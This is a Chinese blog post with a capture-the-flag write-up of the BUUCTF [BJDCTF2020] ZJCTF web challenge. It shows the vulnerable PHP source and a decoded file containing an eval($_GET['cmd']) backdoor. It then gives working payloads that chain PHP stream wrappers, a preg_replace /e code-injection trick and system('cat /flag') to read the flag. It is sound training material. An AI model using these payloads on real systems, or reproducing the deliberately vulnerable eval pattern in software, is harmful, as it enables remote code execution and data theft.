BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此

最新推荐文章于 2024-03-30 08:54:29 发布
最新推荐文章于 2024-03-30 08:54:29 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51412071/article/details/124351859
版权

BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此

  • 进入环境后得到源码

    <?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

  • 使用PHP伪协议构造payload

    ?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

    回显

    PD9waHAKJGlkID0gJF9HRVRbJ2lkJ107CiRfU0VTU0lPTlsnaWQnXSA9ICRpZDsKCmZ1bmN0aW9uIGNvbXBsZXgoJHJlLCAkc3RyKSB7CiAgICByZXR1cm4gcHJlZ19yZXBsYWNlKAogICAgICAgICcvKCcgLiAkcmUgLiAnKS9laScsCiAgICAgICAgJ3N0cnRvbG93ZXIoIlxcMSIpJywKICAgICAgICAkc3RyCiAgICApOwp9CgoKZm9yZWFjaCgkX0dFVCBhcyAkcmUgPT4gJHN0cikgewogICAgZWNobyBjb21wbGV4KCRyZSwgJHN0cikuICJcbiI7Cn0KCmZ1bmN0aW9uIGdldEZsYWcoKXsKCUBldmFsKCRfR0VUWydjbWQnXSk7Cn0K

    base64解密

    <?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

  • 这里可以看出cmd参数存在命令执行漏洞,但问题是如何调用getFlag()函数。这里涉及到 preg_replace /e 模式的代码执行漏洞

    function complex($re, $str) {
    return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}

foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

    若payload为

    /?.*={${phpinfo()}}


    原先的语句: preg_replace('/(' . $regex . ')/ei', 'strtolower("\\1")', $value);
变成了语句: preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}});

    注意:正则表达式模式或部分模式两边添加()将导致匹配到的字符串存储到临时缓冲区中,缓冲区编号从1开始,最多存储99个子表达式。每个缓冲区都可以用\n访问,其中n为缓冲区编号。

    preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}});将会把{${phpinfo()}}存储到缓冲区1,此时匹配后的字符串为/(\\1)/ei\\1\1,这将会导致反向引用缓冲区的内容,将其修改为/{${phpinfo()}}/ei,从而导致命令执行。

  • 在本题中,PHP会将传入的非法的$_GET数组参数名转化为下划线,即将.*转化为_。可以修改payload为

    ?\S*=${getFlag()}&cmd=...

    其中\S表示匹配任何非空白字符,从而达到我们调用getFlag函数的目的

  • 构造payload

    ?\S*=${getFlag()}&cmd=system('cat /flag');

    回显

    flag{6b53cc7c-e9e8-47a1-80ed-10ca16c81ae5} system('cat /flag');
Y1Daa
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF部分web题目
05-06
写题记录
BUUCTF-web类-[BJDCTF2020]ZJCTF不过如此
weixin_44622228的博客
04-20 1907
BUUCTF-web类-[BJDCTF2020]ZJCTF不过如此 分析代码,ge传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪...
[BJDCTF2020]ZJCTF不过如此
05-07 340
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_mat.
[BJDCTF2020]ZJCTF不过如此(wp)
最新发布
wikey 的博客
03-30 187
看到file_get_contents()函数,就要联想到用php伪协议,需要用data://协议用filter协议去读下next.php的源码。一道老题,nss和buu上都有这道题,但是同样的步骤在buu上可以做出来但是nss平台上有点问题,就以buu为讲解。data://数据流封装器,以传递相应格式的数据。
web buuctf [BJDCTF2020]ZJCTF不过如此
weixin_44214568的博客
03-23 1952
考点:正则匹配; 正则-反向引用; preg_replace /e模式漏洞 1. 一路做buuctf下来, web buuctf [ZJCTF 2019]NiZhuanSiWei1_半杯雨水敬过客的博客-CSDN博客 和这题的思路一样,不做赘述,主要是利用php伪协议 1.令text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=(I have a dream的base64加密) file=php://filter/read=convert..
BUUCTF [BJDCTF2020]ZJCTF不过如此(正则e模式漏洞)
qq_54929891的博客
03-06 2631
进去就是一串PHP代码,代码功能是:用GET方法传入text和file两个参数的值 (file_get_contents函数代表将名字为text的文件以只读的方式打开,并且将文件内容读入到一个字符串中),如果读入的内容是I have a dream,则会输出该字符串内容并且正则表达式来匹配file参数传入的值,若匹配失败则直接GG 这个时候我们要用到伪协议data了,它可以传递文件内容也可以执行函数(函数一般要base64),这里我们传递文件内容就行了text=data://text/plain...
BUUCTF WEB ZJCTF,不过如此1
qq_41696858的博客
12-11 534
上来就给源码,很直接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; i
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BUUCTF [BJDCTF2020] ZJCTF不过如此
Senimo
12-10 494
BUUCTF [BJDCTF2020] ZJCTF不过如此 考点: php伪协议读取源码 函数preg_replace()在\e模式下,存在代码执行漏洞 对于传入的非法的$_GET数组参数名,会将其转换成下划线_ 启动环境,给出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I
[bjdctf2020]zjctf不过如此
m0_62593857的博客
08-16 206
preg_replace函数中,用strtolower("\\1")替换正则表达式匹配到的字符串,正则表达式跟$re有关,而$re又是通过GET方法传的参数名称,所以可控,要匹配的$str则是参数值,所以也可控,“\\1”其实就是\1,意思是第一个子匹配项,使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行。
BUUCTF [BJDCTF2020]ZJCTF不过如此
Chu_Jian_Xiong的博客
09-29 560
[BJDCTF2020]ZJCTF不过如此考点PHP伪协议preg_replace远程代码执行实操 考点 PHP伪协议 https://www.cnblogs.com/wjrblogs/p/12285202.html preg_replace远程代码执行 https://zhuanlan.zhihu.com/p/47353283 实操 打开题目 乍一看,显然是一个PHP伪协议的题目,要求"I have a dream",以及提示包含next.php PD9waHAKJGlkID0gJF9HRVRb
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2234
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
[BJDCTF2020]ZJCTF不过如此(preg_replace的/e漏洞,PHP的特性)
qq_44657899的博客
05-16 1146
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_matc
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace)
qq_43622442的博客
05-09 1790
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace) 1.打开网站,审计,第一个if可以用php://input 或者 data://伪协议绕过,php伪协议分析可看php伪协议: 2.然后往下,提示next.php文件,这里可以用php://filter伪协议拿到它的源码: 3.payload: http://90812d78-a226-4cdf-be8f-8baa9961fb89.node3.buuoj.cn/?text=php://input&f
[BJDCTF2020]ZJCTF不过如此(php伪协议,data伪协议,preg_replace /e漏洞)
weixin_44110537的博客
10-04 466
伪协议常用在文件包含漏洞中. 常见的文件包含函数有: include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile. 具体的函数功能可以参考. 伪协议的学习 通过data协议构造 data://text/plain,I have a dream 通过php协议构造 php://filter/convert.base64-encode/resource=ne.
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值